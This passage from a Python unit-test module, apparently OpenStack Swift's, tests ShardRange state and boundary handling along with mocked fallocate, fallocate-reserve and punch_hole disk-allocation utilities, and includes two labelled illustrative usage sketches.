sr.increment_meta(*args) check_bad_args('bad', 10) check_bad_args(10, 'bad') def test_state_timestamp_setter(self): ts_1 = next(self.ts_iter) sr = utils.ShardRange('a/test', ts_1, 'l', 'u', 0, 0, None) self.assertEqual(ts_1, sr.timestamp) self.assertEqual(ts_1, sr.state_timestamp) ts_2 = next(self.ts_iter) sr.state_timestamp = ts_2 self.assertEqual(ts_1, sr.timestamp) self.assertEqual(ts_2, sr.state_timestamp) ts_3 = next(self.ts_iter) sr.timestamp = ts_3 
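# --- Illustrative sketch, not part of the original test module -------------
# Mutating a ShardRange as the surrounding tests do: update_meta() and
# increment_meta() track object count and bytes used (stamping
# meta_timestamp), and update_state() returns True only when the state
# actually changes.  Assumes swift is importable; the numbers are arbitrary.
def _demo_shard_range_updates():
    from swift.common import utils

    sr = utils.ShardRange('a/c', utils.Timestamp.now())
    sr.update_meta(9, 99)                       # object_count, bytes_used
    sr.increment_meta(1, 1)                     # now 10 objects, 100 bytes
    changed = sr.update_state(utils.ShardRange.ACTIVE)        # -> True
    changed_again = sr.update_state(utils.ShardRange.ACTIVE)  # -> False
    return sr.object_count, sr.bytes_used, changed, changed_again
# ---------------------------------------------------------------------------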
self.assertEqual(ts_3, sr.timestamp) self.assertEqual(ts_2, sr.state_timestamp) # state_timestamp defaults to tracking timestamp sr.state_timestamp = None self.assertEqual(ts_3, sr.timestamp) self.assertEqual(ts_3, sr.state_timestamp) ts_4 = next(self.ts_iter) sr.timestamp = ts_4 self.assertEqual(ts_4, sr.timestamp) self.assertEqual(ts_4, sr.state_timestamp) sr.state_timestamp = 0 self.assertEqual(ts_4, sr.timestamp) self.assertEqual(utils.Timestamp(0), sr.state_timestamp) def test_state_setter(self): for state in utils.ShardRange.STATES: for test_value in (state, str(state)): sr = utils.ShardRange('a/test', next(self.ts_iter), 'l', 'u') sr.state = test_value actual = sr.state self.assertEqual( state, actual, 'Expected %s but got %s for %s' % (state, actual, test_value) ) for bad_state in (max(utils.ShardRange.STATES) + 1, -1, 99, None, 'stringy', 1.1): sr = utils.ShardRange('a/test', next(self.ts_iter), 'l', 'u') with self.assertRaises(ValueError) as cm: sr.state = bad_state self.assertIn('Invalid state', str(cm.exception)) def test_update_state(self): sr = utils.ShardRange('a/c', next(self.ts_iter)) old_sr = sr.copy() self.assertEqual(utils.ShardRange.FOUND, sr.state) self.assertEqual(dict(sr), dict(old_sr)) # sanity check for state in utils.ShardRange.STATES: if state == utils.ShardRange.FOUND: continue self.assertTrue(sr.update_state(state)) self.assertEqual(dict(old_sr, state=state), dict(sr)) self.assertFalse(sr.update_state(state)) self.assertEqual(dict(old_sr, state=state), dict(sr)) sr = utils.ShardRange('a/c', next(self.ts_iter)) old_sr = sr.copy() for state in utils.ShardRange.STATES: ts = next(self.ts_iter) self.assertTrue(sr.update_state(state, state_timestamp=ts)) self.assertEqual(dict(old_sr, state=state, state_timestamp=ts), dict(sr)) def test_resolve_state(self): for name, number in utils.ShardRange.STATES_BY_NAME.items(): self.assertEqual( (number, name), utils.ShardRange.resolve_state(name)) self.assertEqual( (number, name), utils.ShardRange.resolve_state(name.upper())) self.assertEqual( (number, name), utils.ShardRange.resolve_state(name.title())) self.assertEqual( (number, name), utils.ShardRange.resolve_state(number)) def check_bad_value(value): with self.assertRaises(ValueError) as cm: utils.ShardRange.resolve_state(value) self.assertIn('Invalid state %r' % value, str(cm.exception)) check_bad_value(min(utils.ShardRange.STATES) - 1) check_bad_value(max(utils.ShardRange.STATES) + 1) check_bad_value('badstate') def test_epoch_setter(self): sr = utils.ShardRange('a/c', next(self.ts_iter)) self.assertIsNone(sr.epoch) ts = next(self.ts_iter) sr.epoch = ts self.assertEqual(ts, sr.epoch) ts = next(self.ts_iter) sr.epoch = ts.internal self.assertEqual(ts, sr.epoch) sr.epoch = None self.assertIsNone(sr.epoch) with self.assertRaises(ValueError): sr.epoch = 'bad' def test_deleted_setter(self): sr = utils.ShardRange('a/c', next(self.ts_iter)) for val in (True, 1): sr.deleted = val self.assertIs(True, sr.deleted) for val in (False, 0, None): sr.deleted = val self.assertIs(False, sr.deleted) def test_set_deleted(self): sr = utils.ShardRange('a/c', next(self.ts_iter)) # initialise other timestamps sr.update_state(utils.ShardRange.ACTIVE, state_timestamp=utils.Timestamp.now()) sr.update_meta(1, 2) old_sr = sr.copy() self.assertIs(False, sr.deleted) # sanity check self.assertEqual(dict(sr), dict(old_sr)) # sanity check with mock_timestamp_now(next(self.ts_iter)) as now: self.assertTrue(sr.set_deleted()) self.assertEqual(now, sr.timestamp) self.assertIs(True, sr.deleted) old_sr_dict = 
dict(old_sr) old_sr_dict.pop('deleted') old_sr_dict.pop('timestamp') sr_dict = dict(sr) sr_dict.pop('deleted') sr_dict.pop('timestamp') self.assertEqual(old_sr_dict, sr_dict) # no change self.assertFalse(sr.set_deleted()) self.assertEqual(now, sr.timestamp) self.assertIs(True, sr.deleted) # force timestamp change with mock_timestamp_now(next(self.ts_iter)) as now: self.assertTrue(sr.set_deleted(timestamp=now)) self.assertEqual(now, sr.timestamp) self.assertIs(True, sr.deleted) def test_lower_setter(self): sr = utils.ShardRange('a/c', utils.Timestamp.now(), 'b', '') # sanity checks self.assertEqual('b', sr.lower_str) self.assertEqual(sr.MAX, sr.upper) def do_test(good_value, expected): sr.lower = good_value self.assertEqual(expected, sr.lower) self.assertEqual(sr.MAX, sr.upper) do_test(utils.ShardRange.MIN, utils.ShardRange.MIN) do_test(utils.ShardRange.MAX, utils.ShardRange.MAX) do_test(b'', utils.ShardRange.MIN) do_test(u'', utils.ShardRange.MIN) do_test(None, utils.ShardRange.MIN) do_test(b'a', 'a') do_test(b'y', 'y') do_test(u'a', 'a') do_test(u'y', 'y') expected = u'\N{SNOWMAN}' if six.PY2: expected = expected.encode('utf-8') do_test(u'\N{SNOWMAN}', expected) do_test(u'\N{SNOWMAN}'.encode('utf-8'), expected) sr = utils.ShardRange('a/c', utils.Timestamp.now(), 'b', 'y') sr.lower = '' self.assertEqual(sr.MIN, sr.lower) sr = utils.ShardRange('a/c', utils.Timestamp.now(), 'b', 'y') with self.assertRaises(ValueError) as cm: sr.lower = 'z' self.assertIn("must be less than or equal to upper", str(cm.exception)) self.assertEqual('b', sr.lower_str) self.assertEqual('y', sr.upper_str) def do_test(bad_value): with self.assertRaises(TypeError) as cm: sr.lower = bad_value self.assertIn("lower must be a string", str(cm.exception)) self.assertEqual('b', sr.lower_str) self.assertEqual('y', sr.upper_str) do_test(1) do_test(1.234) def test_upper_setter(self): sr = utils.ShardRange('a/c', utils.Timestamp.now(), '', 'y') # sanity checks self.assertEqual(sr.MIN, sr.lower) self.assertEqual('y', sr.upper_str) def do_test(good_value, expected): sr.upper = good_value self.assertEqual(expected, sr.upper) self.assertEqual(sr.MIN, sr.lower) do_test(utils.ShardRange.MIN, utils.ShardRange.MIN) do_test(utils.ShardRange.MAX, utils.ShardRange.MAX) do_test(b'', utils.ShardRange.MAX) do_test(u'', utils.ShardRange.MAX) do_test(None, utils.ShardRange.MAX) do_test(b'z', 'z') do_test(b'b', 'b') do_test(u'z', 'z') do_test(u'b', 'b') expected = u'\N{SNOWMAN}' if six.PY2: expected = expected.encode('utf-8') do_test(u'\N{SNOWMAN}', expected) do_test(u'\N{SNOWMAN}'.encode('utf-8'), expected) sr = utils.ShardRange('a/c', utils.Timestamp.now(), 'b', 'y') sr.upper = '' self.assertEqual(sr.MAX, sr.upper) sr = utils.ShardRange('a/c', utils.Timestamp.now(), 'b', 'y') with self.assertRaises(ValueError) as cm: sr.upper = 'a' self.assertIn( "must be greater than or equal to lower", str(cm.exception)) self.assertEqual('b', sr.lower_str) self.assertEqual('y', sr.upper_str) def do_test(bad_value): with self.assertRaises(TypeError) as cm: sr.upper = bad_value self.assertIn("upper must be a string", str(cm.exception)) self.assertEqual('b', sr.lower_str) self.assertEqual('y', sr.upper_str) do_test(1) do_test(1.234) def test_end_marker(self): sr = utils.ShardRange('a/c', utils.Timestamp.now(), '', 'y') self.assertEqual('y\x00', sr.end_marker) sr = utils.ShardRange('a/c', utils.Timestamp.now(), '', '') self.assertEqual('', sr.end_marker) def test_bounds_serialization(self): sr = utils.ShardRange('a/c', utils.Timestamp.now()) 
self.assertEqual('a/c', sr.name) self.assertEqual(utils.ShardRange.MIN, sr.lower) self.assertEqual('', sr.lower_str) self.assertEqual(utils.ShardRange.MAX, sr.upper) self.assertEqual('', sr.upper_str) self.assertEqual('', sr.end_marker) lower = u'\u00e4' upper = u'\u00fb' sr = utils.ShardRange('a/%s-%s' % (lower, upper), utils.Timestamp.now(), lower, upper) exp_lower = lower exp_upper = upper if six.PY2: exp_lower = exp_lower.encode('utf-8') exp_upper = exp_upper.encode('utf-8') self.assertEqual(exp_lower, sr.lower) self.assertEqual(exp_lower, sr.lower_str) self.assertEqual(exp_upper, sr.upper) self.assertEqual(exp_upper, sr.upper_str) self.assertEqual(exp_upper + '\x00', sr.end_marker) def test_entire_namespace(self): # test entire range (no boundaries) entire = utils.ShardRange('a/test', utils.Timestamp.now()) self.assertEqual(utils.ShardRange.MAX, entire.upper) self.assertEqual(utils.ShardRange.MIN, entire.lower) self.assertIs(True, entire.entire_namespace()) for x in range(100): self.assertTrue(str(x) in entire) self.assertTrue(chr(x) in entire) for x in ('a', 'z', 'zzzz', '124fsdf', u'\u00e4'): self.assertTrue(x in entire, '%r should be in %r' % (x, entire)) entire.lower = 'a' self.assertIs(False, entire.entire_namespace()) def test_comparisons(self): ts = utils.Timestamp.now().internal # upper (if provided) *must* be greater than lower with self.assertRaises(ValueError): utils.ShardRange('f-a', ts, 'f', 'a') # test basic boundaries btoc = utils.ShardRange('a/b-c', ts, 'b', 'c') atof = utils.ShardRange('a/a-f', ts, 'a', 'f') ftol = utils.ShardRange('a/f-l', ts, 'f', 'l') ltor = utils.ShardRange('a/l-r', ts, 'l', 'r') rtoz = utils.ShardRange('a/r-z', ts, 'r', 'z') lower = utils.ShardRange('a/lower', ts, '', 'mid') upper = utils.ShardRange('a/upper', ts, 'mid', '') entire = utils.ShardRange('a/test', utils.Timestamp.now()) # overlapping ranges dtof = utils.ShardRange('a/d-f', ts, 'd', 'f') dtom = utils.ShardRange('a/d-m', ts, 'd', 'm') # test range > and < # non-adjacent self.assertFalse(rtoz < atof) self.assertTrue(atof < ltor) self.assertTrue(ltor > atof) self.assertFalse(ftol > rtoz) # adjacent self.assertFalse(rtoz < ltor) self.assertTrue(ltor < rtoz) self.assertFalse(ltor > rtoz) self.assertTrue(rtoz > ltor) # wholly within self.assertFalse(btoc < atof) self.assertFalse(btoc > atof) self.assertFalse(atof < btoc) self.assertFalse(atof > btoc) self.assertFalse(atof < dtof) self.assertFalse(dtof > atof) self.assertFalse(atof > dtof) self.assertFalse(dtof < atof) self.assertFalse(dtof < dtom) self.assertFalse(dtof > dtom) self.assertFalse(dtom > dtof) self.assertFalse(dtom < dtof) # overlaps self.assertFalse(atof < dtom) self.assertFalse(atof > dtom) self.assertFalse(ltor > dtom) # ranges including min/max bounds self.assertTrue(upper > lower) self.assertTrue(lower < upper) self.assertFalse(upper < lower) self.assertFalse(lower > upper) self.assertFalse(lower < entire) self.assertFalse(entire > lower) self.assertFalse(lower > entire) self.assertFalse(entire < lower) self.assertFalse(upper < entire) self.assertFalse(entire > upper) self.assertFalse(upper > entire) self.assertFalse(entire < upper) self.assertFalse(entire < entire) self.assertFalse(entire > entire) # test range < and > to an item # range is > lower and <= upper to lower boundary isn't # actually included self.assertTrue(ftol > 'f') self.assertFalse(atof < 'f') self.assertTrue(ltor < 'y') self.assertFalse(ftol < 'f') self.assertFalse(atof > 'f') self.assertFalse(ltor > 'y') self.assertTrue('f' < ftol) self.assertFalse('f' 
> atof) self.assertTrue('y' > ltor) self.assertFalse('f' > ftol) self.assertFalse('f' < atof) self.assertFalse('y' < ltor) # Now test ranges with only 1 boundary start_to_l = utils.ShardRange('a/None-l', ts, '', 'l') l_to_end = utils.ShardRange('a/l-None', ts, 'l', '') for x in ('l', 'm', 'z', 'zzz1231sd'): if x == 'l': self.assertFalse(x in l_to_end) self.assertFalse(start_to_l < x) self.assertFalse(x > start_to_l) else: self.assertTrue(x in l_to_end) self.assertTrue(start_to_l < x) self.assertTrue(x > start_to_l) # Now test some of the range to range checks with missing boundaries self.assertFalse(atof < start_to_l) self.assertFalse(start_to_l < entire) # Now test ShardRange.overlaps(other) self.assertTrue(atof.overlaps(atof)) self.assertFalse(atof.overlaps(ftol)) self.assertFalse(ftol.overlaps(atof)) self.assertTrue(atof.overlaps(dtof)) self.assertTrue(dtof.overlaps(atof)) self.assertFalse(dtof.overlaps(ftol)) self.assertTrue(dtom.overlaps(ftol)) self.assertTrue(ftol.overlaps(dtom)) self.assertFalse(start_to_l.overlaps(l_to_end)) def test_contains(self): ts = utils.Timestamp.now().internal lower = utils.ShardRange('a/-h', ts, '', 'h') mid = utils.ShardRange('a/h-p', ts, 'h', 'p') upper = utils.ShardRange('a/p-', ts, 'p', '') entire = utils.ShardRange('a/all', ts, '', '') self.assertTrue('a' in entire) self.assertTrue('x' in entire) # the empty string is not a valid object name, so it cannot be in any # range self.assertFalse('' in lower) self.assertFalse('' in upper) self.assertFalse('' in entire) self.assertTrue('a' in lower) self.assertTrue('h' in lower) self.assertFalse('i' in lower) self.assertFalse('h' in mid) self.assertTrue('p' in mid) self.assertFalse('p' in upper) self.assertTrue('x' in upper) self.assertIn(utils.ShardRange.MAX, entire) self.assertNotIn(utils.ShardRange.MAX, lower) self.assertIn(utils.ShardRange.MAX, upper) # lower bound is excluded so MIN cannot be in any range. 
self.assertNotIn(utils.ShardRange.MIN, entire) self.assertNotIn(utils.ShardRange.MIN, upper) self.assertNotIn(utils.ShardRange.MIN, lower) def test_includes(self): ts = utils.Timestamp.now().internal _to_h = utils.ShardRange('a/-h', ts, '', 'h') d_to_t = utils.ShardRange('a/d-t', ts, 'd', 't') d_to_k = utils.ShardRange('a/d-k', ts, 'd', 'k') e_to_l = utils.ShardRange('a/e-l', ts, 'e', 'l') k_to_t = utils.ShardRange('a/k-t', ts, 'k', 't') p_to_ = utils.ShardRange('a/p-', ts, 'p', '') t_to_ = utils.ShardRange('a/t-', ts, 't', '') entire = utils.ShardRange('a/all', ts, '', '') self.assertTrue(entire.includes(entire)) self.assertTrue(d_to_t.includes(d_to_t)) self.assertTrue(_to_h.includes(_to_h)) self.assertTrue(p_to_.includes(p_to_)) self.assertTrue(entire.includes(_to_h)) self.assertTrue(entire.includes(d_to_t)) self.assertTrue(entire.includes(p_to_)) self.assertTrue(d_to_t.includes(d_to_k)) self.assertTrue(d_to_t.includes(e_to_l)) self.assertTrue(d_to_t.includes(k_to_t)) self.assertTrue(p_to_.includes(t_to_)) self.assertFalse(_to_h.includes(d_to_t)) self.assertFalse(p_to_.includes(d_to_t)) self.assertFalse(k_to_t.includes(d_to_k)) self.assertFalse(d_to_k.includes(e_to_l)) self.assertFalse(k_to_t.includes(e_to_l)) self.assertFalse(t_to_.includes(p_to_)) self.assertFalse(_to_h.includes(entire)) self.assertFalse(p_to_.includes(entire)) self.assertFalse(d_to_t.includes(entire)) def test_repr(self): ts = next(self.ts_iter) ts.offset = 1234 meta_ts = next(self.ts_iter) state_ts = next(self.ts_iter) sr = utils.ShardRange('a/c', ts, 'l', 'u', 100, 1000, meta_timestamp=meta_ts, state=utils.ShardRange.ACTIVE, state_timestamp=state_ts) self.assertEqual( "ShardRange<%r to %r as of %s, (100, 1000) as of %s, " "active as of %s>" % ('l', 'u', ts.internal, meta_ts.internal, state_ts.internal), str(sr)) ts.offset = 0 meta_ts.offset = 2 state_ts.offset = 3 sr = utils.ShardRange('a/c', ts, '', '', 100, 1000, meta_timestamp=meta_ts, state=utils.ShardRange.FOUND, state_timestamp=state_ts) self.assertEqual( "ShardRange<MinBound to MaxBound as of %s, (100, 1000) as of %s, " "found as of %s>" % (ts.internal, meta_ts.internal, state_ts.internal), str(sr)) def test_copy(self): sr = utils.ShardRange('a/c', next(self.ts_iter), 'x', 'y', 99, 99000, meta_timestamp=next(self.ts_iter), state=utils.ShardRange.CREATED, state_timestamp=next(self.ts_iter)) new = sr.copy() self.assertEqual(dict(sr), dict(new)) new = sr.copy(deleted=1) self.assertEqual(dict(sr, deleted=1), dict(new)) new_timestamp = next(self.ts_iter) new = sr.copy(timestamp=new_timestamp) self.assertEqual(dict(sr, timestamp=new_timestamp.internal, meta_timestamp=new_timestamp.internal, state_timestamp=new_timestamp.internal), dict(new)) new = sr.copy(timestamp=new_timestamp, object_count=99) self.assertEqual(dict(sr, timestamp=new_timestamp.internal, meta_timestamp=new_timestamp.internal, state_timestamp=new_timestamp.internal, object_count=99), dict(new)) def test_make_path(self): ts = utils.Timestamp.now() actual = utils.ShardRange.make_path('a', 'root', 'parent', ts, 0) parent_hash = hashlib.md5(b'parent').hexdigest() self.assertEqual('a/root-%s-%s-0' % (parent_hash, ts.internal), actual) actual = utils.ShardRange.make_path('a', 'root', 'parent', ts, 3) self.assertEqual('a/root-%s-%s-3' % (parent_hash, ts.internal), actual) actual = utils.ShardRange.make_path('a', 'root', 'parent', ts, '3') self.assertEqual('a/root-%s-%s-3' % (parent_hash, ts.internal), actual) actual = utils.ShardRange.make_path( 'a', 'root', 'parent', ts.internal, '3') 
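# --- Illustrative sketch, not part of the original test module -------------
# ShardRange.make_path() builds the container path for a shard from the
# shards account, the root and parent container names, a timestamp and an
# index, embedding an md5 of the parent name.  Assumes swift is importable;
# the account/container names below are hypothetical.
def _demo_shard_range_make_path():
    from swift.common import utils

    ts = utils.Timestamp.now()
    path = utils.ShardRange.make_path('.shards_a', 'root_c', 'parent_c', ts, 3)
    return path     # -> '.shards_a/root_c-<md5(parent_c)>-<ts.internal>-3'
# ---------------------------------------------------------------------------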
self.assertEqual('a/root-%s-%s-3' % (parent_hash, ts.internal), actual) actual = utils.ShardRange.make_path('a', 'root', 'parent', ts, 'foo') self.assertEqual('a/root-%s-%s-foo' % (parent_hash, ts.internal), actual) @patch('ctypes.get_errno') @patch.object(utils, '_sys_posix_fallocate') @patch.object(utils, '_sys_fallocate') @patch.object(utils, 'FALLOCATE_RESERVE', 0) class TestFallocate(unittest.TestCase): def test_fallocate(self, sys_fallocate_mock, sys_posix_fallocate_mock, get_errno_mock): sys_fallocate_mock.available = True sys_fallocate_mock.return_value = 0 utils.fallocate(1234, 5000 * 2 ** 20) # We can't use sys_fallocate_mock.assert_called_once_with because no # two ctypes.c_uint64 objects are equal even if their values are # equal. Yes, ctypes.c_uint64(123) != ctypes.c_uint64(123). calls = sys_fallocate_mock.mock_calls self.assertEqual(len(calls), 1) args = calls[0][1] self.assertEqual(len(args), 4) self.assertEqual(args[0], 1234) self.assertEqual(args[1], utils.FALLOC_FL_KEEP_SIZE) self.assertEqual(args[2].value, 0) self.assertEqual(args[3].value, 5000 * 2 ** 20) sys_posix_fallocate_mock.assert_not_called() def test_fallocate_offset(self, sys_fallocate_mock, sys_posix_fallocate_mock, get_errno_mock): sys_fallocate_mock.available = True sys_fallocate_mock.return_value = 0 utils.fallocate(1234, 5000 * 2 ** 20, offset=3 * 2 ** 30) calls = sys_fallocate_mock.mock_calls self.assertEqual(len(calls), 1) args = calls[0][1] self.assertEqual(len(args), 4) self.assertEqual(args[0], 1234) self.assertEqual(args[1], utils.FALLOC_FL_KEEP_SIZE) self.assertEqual(args[2].value, 3 * 2 ** 30) self.assertEqual(args[3].value, 5000 * 2 ** 20) sys_posix_fallocate_mock.assert_not_called() def test_fallocate_fatal_error(self, sys_fallocate_mock, sys_posix_fallocate_mock, get_errno_mock): sys_fallocate_mock.available = True sys_fallocate_mock.return_value = -1 get_errno_mock.return_value = errno.EIO with self.assertRaises(OSError) as cm: utils.fallocate(1234, 5000 * 2 ** 20) self.assertEqual(cm.exception.errno, errno.EIO) def test_fallocate_silent_errors(self, sys_fallocate_mock, sys_posix_fallocate_mock, get_errno_mock): sys_fallocate_mock.available = True sys_fallocate_mock.return_value = -1 for silent_error in (0, errno.ENOSYS, errno.EOPNOTSUPP, errno.EINVAL): get_errno_mock.return_value = silent_error try: utils.fallocate(1234, 5678) except OSError: self.fail("fallocate() raised an error on %d", silent_error) def test_posix_fallocate_fallback(self, sys_fallocate_mock, sys_posix_fallocate_mock, get_errno_mock): sys_fallocate_mock.available = False sys_fallocate_mock.side_effect = NotImplementedError sys_posix_fallocate_mock.available = True sys_posix_fallocate_mock.return_value = 0 utils.fallocate(1234, 567890) sys_fallocate_mock.assert_not_called() calls = sys_posix_fallocate_mock.mock_calls self.assertEqual(len(calls), 1) args = calls[0][1] self.assertEqual(len(args), 3) self.assertEqual(args[0], 1234) self.assertEqual(args[1].value, 0) self.assertEqual(args[2].value, 567890) def test_posix_fallocate_offset(self, sys_fallocate_mock, sys_posix_fallocate_mock, get_errno_mock): sys_fallocate_mock.available = False sys_fallocate_mock.side_effect = NotImplementedError sys_posix_fallocate_mock.available = True sys_posix_fallocate_mock.return_value = 0 utils.fallocate(1234, 5000 * 2 ** 20, offset=3 * 2 ** 30) calls = sys_posix_fallocate_mock.mock_calls self.assertEqual(len(calls), 1) args = calls[0][1] self.assertEqual(len(args), 3) self.assertEqual(args[0], 1234) self.assertEqual(args[1].value, 3 * 2 ** 
30) self.assertEqual(args[2].value, 5000 * 2 ** 20) sys_fallocate_mock.assert_not_called() def test_no_fallocates_available(self, sys_fallocate_mock, sys_posix_fallocate_mock, get_errno_mock): sys_fallocate_mock.available = False sys_posix_fallocate_mock.available = False with mock.patch("logging.warning") as warning_mock, \ mock.patch.object(utils, "_fallocate_warned_about_missing", False): utils.fallocate(321, 654) utils.fallocate(321, 654) sys_fallocate_mock.assert_not_called() sys_posix_fallocate_mock.assert_not_called() get_errno_mock.assert_not_called() self.assertEqual(len(warning_mock.mock_calls), 1) def test_arg_bounds(self, sys_fallocate_mock, sys_posix_fallocate_mock, get_errno_mock): sys_fallocate_mock.available = True sys_fallocate_mock.return_value = 0 with self.assertRaises(ValueError): utils.fallocate(0, 1 << 64, 0) with self.assertRaises(ValueError): utils.fallocate(0, 0, -1) with self.assertRaises(ValueError): utils.fallocate(0, 0, 1 << 64) self.assertEqual([], sys_fallocate_mock.mock_calls) # sanity check utils.fallocate(0, 0, 0) self.assertEqual( [mock.call(0, utils.FALLOC_FL_KEEP_SIZE, mock.ANY, mock.ANY)], sys_fallocate_mock.mock_calls) # Go confirm the ctypes values separately; apparently == doesn't # work the way you'd expect with ctypes :-/ self.assertEqual(sys_fallocate_mock.mock_calls[0][1][2].value, 0) self.assertEqual(sys_fallocate_mock.mock_calls[0][1][3].value, 0) sys_fallocate_mock.reset_mock() # negative size will be adjusted as 0 utils.fallocate(0, -1, 0) self.assertEqual( [mock.call(0, utils.FALLOC_FL_KEEP_SIZE, mock.ANY, mock.ANY)], sys_fallocate_mock.mock_calls) self.assertEqual(sys_fallocate_mock.mock_calls[0][1][2].value, 0) self.assertEqual(sys_fallocate_mock.mock_calls[0][1][3].value, 0) @patch.object(os, 'fstatvfs') @patch.object(utils, '_sys_fallocate', available=True, return_value=0) @patch.object(utils, 'FALLOCATE_RESERVE', 0) @patch.object(utils, 'FALLOCATE_IS_PERCENT', False) @patch.object(utils, '_fallocate_enabled', True) class TestFallocateReserve(unittest.TestCase): def _statvfs_result(self, f_frsize, f_bavail): # Only 3 values are relevant to us, so use zeros for the rest f_blocks = 100 return posix.statvfs_result((0, f_frsize, f_blocks, 0, f_bavail, 0, 0, 0, 0, 0)) def test_disabled(self, sys_fallocate_mock, fstatvfs_mock): utils.disable_fallocate() utils.fallocate(123, 456) sys_fallocate_mock.assert_not_called() fstatvfs_mock.assert_not_called() def test_zero_reserve(self, sys_fallocate_mock, fstatvfs_mock): utils.fallocate(123, 456) fstatvfs_mock.assert_not_called() self.assertEqual(len(sys_fallocate_mock.mock_calls), 1) def test_enough_space(self, sys_fallocate_mock, fstatvfs_mock): # Want 1024 bytes in reserve plus 1023 allocated, and have 2 blocks # of size 1024 free, so succeed utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \ utils.config_fallocate_value('1024') fstatvfs_mock.return_value = self._statvfs_result(1024, 2) utils.fallocate(88, 1023) def test_not_enough_space(self, sys_fallocate_mock, fstatvfs_mock): # Want 1024 bytes in reserve plus 1024 allocated, and have 2 blocks # of size 1024 free, so fail utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \ utils.config_fallocate_value('1024') fstatvfs_mock.return_value = self._statvfs_result(1024, 2) with self.assertRaises(OSError) as catcher: utils.fallocate(88, 1024) self.assertEqual( str(catcher.exception), '[Errno %d] FALLOCATE_RESERVE fail 1024 <= 1024' % errno.ENOSPC) sys_fallocate_mock.assert_not_called() def test_not_enough_space_large(self, sys_fallocate_mock, 
fstatvfs_mock): # Want 1024 bytes in reserve plus 1GB allocated, and have 2 blocks # of size 1024 free, so fail utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \ utils.config_fallocate_value('1024') fstatvfs_mock.return_value = self._statvfs_result(1024, 2) with self.assertRaises(OSError) as catcher: utils.fallocate(88, 1 << 30) self.assertEqual( str(catcher.exception), '[Errno %d] FALLOCATE_RESERVE fail %g <= 1024' % (errno.ENOSPC, ((2 * 1024) - (1 << 30)))) sys_fallocate_mock.assert_not_called() def test_enough_space_small_blocks(self, sys_fallocate_mock, fstatvfs_mock): # Want 1024 bytes in reserve plus 1023 allocated, and have 4 blocks # of size 512 free, so succeed utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \ utils.config_fallocate_value('1024') fstatvfs_mock.return_value = self._statvfs_result(512, 4) utils.fallocate(88, 1023) def test_not_enough_space_small_blocks(self, sys_fallocate_mock, fstatvfs_mock): # Want 1024 bytes in reserve plus 1024 allocated, and have 4 blocks # of size 512 free, so fail utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \ utils.config_fallocate_value('1024') fstatvfs_mock.return_value = self._statvfs_result(512, 4) with self.assertRaises(OSError) as catcher: utils.fallocate(88, 1024) self.assertEqual( str(catcher.exception), '[Errno %d] FALLOCATE_RESERVE fail 1024 <= 1024' % errno.ENOSPC) sys_fallocate_mock.assert_not_called() def test_free_space_under_reserve(self, sys_fallocate_mock, fstatvfs_mock): # Want 2048 bytes in reserve but have only 3 blocks of size 512, so # allocating even 0 bytes fails utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \ utils.config_fallocate_value('2048') fstatvfs_mock.return_value = self._statvfs_result(512, 3) with self.assertRaises(OSError) as catcher: utils.fallocate(88, 0) self.assertEqual( str(catcher.exception), '[Errno %d] FALLOCATE_RESERVE fail 1536 <= 2048' % errno.ENOSPC) sys_fallocate_mock.assert_not_called() def test_all_reserved(self, sys_fallocate_mock, fstatvfs_mock): # Filesystem is empty, but our reserve is bigger than the # filesystem, so any allocation will fail utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \ utils.config_fallocate_value('9999999999999') fstatvfs_mock.return_value = self._statvfs_result(1024, 100) self.assertRaises(OSError, utils.fallocate, 88, 0) sys_fallocate_mock.assert_not_called() def test_enough_space_pct(self, sys_fallocate_mock, fstatvfs_mock): # Want 1% reserved, filesystem has 3/100 blocks of size 1024 free # and file size is 2047, so succeed utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \ utils.config_fallocate_value('1%') fstatvfs_mock.return_value = self._statvfs_result(1024, 3) utils.fallocate(88, 2047) def test_not_enough_space_pct(self, sys_fallocate_mock, fstatvfs_mock): # Want 1% reserved, filesystem has 3/100 blocks of size 1024 free # and file size is 2048, so fail utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \ utils.config_fallocate_value('1%') fstatvfs_mock.return_value = self._statvfs_result(1024, 3) with self.assertRaises(OSError) as catcher: utils.fallocate(88, 2048) self.assertEqual( str(catcher.exception), '[Errno %d] FALLOCATE_RESERVE fail 1 <= 1' % errno.ENOSPC) sys_fallocate_mock.assert_not_called() def test_all_space_reserved_pct(self, sys_fallocate_mock, fstatvfs_mock): # Filesystem is empty, but our reserve is the whole filesystem, so # any allocation will fail utils.FALLOCATE_RESERVE, utils.FALLOCATE_IS_PERCENT = \ utils.config_fallocate_value('100%') fstatvfs_mock.return_value = 
self._statvfs_result(1024, 100) with self.assertRaises(OSError) as catcher: utils.fallocate(88, 0) self.assertEqual( str(catcher.exception), '[Errno %d] FALLOCATE_RESERVE fail 100 <= 100' % errno.ENOSPC) sys_fallocate_mock.assert_not_called() @patch('ctypes.get_errno') @patch.object(utils, '_sys_fallocate') class TestPunchHole(unittest.TestCase): def test_punch_hole(self, sys_fallocate_mock, get_errno_mock): sys_fallocate_mock.available = True sys_fallocate_mock.return_value = 0 utils.punch_hole(123, 456, 789) calls = sys_fallocate_mock.mock_calls self.assertEqual(len(calls), 1) args = calls[0][1] self.assertEqual(len(args), 4) self.assertEqual(args[0], 123) self.assertEqual( args[1], utils.FALLOC_FL_PUNCH_HOLE | utils.FALLOC_FL_KEEP_SIZE) self.assertEqual(args[2].value, 456) self.assertEqual(args[3].value, 789) def test_error(self, sys_fallocate_mock, get_errno_mock): sys_fallocate_mock.available = True sys_fallocate_mock.return_value = -1 get_errno_mock.return_value = errno.EISDIR with self.assertRaises(OSError) as cm: utils.punch_hole(123, 456, 789) self.assertEqual(cm.exception.errno, errno.EISDIR) def test_arg_bounds(self, sys_fallocate_mock, get_errno_mock): sys_fallocate_mock.available = True sys_fallocate_mock.return_value = 0 with self.assertRaises(ValueError): utils.punch_hole(0, 1, -1) with self.assertRaises(ValueError): utils.punch_hole(0, 1 << 64, 1) with self.assertRaises(ValueError): utils.punch_hole(0, -1, 1) with self.assertRaises(ValueError): utils.punch_hole(0, 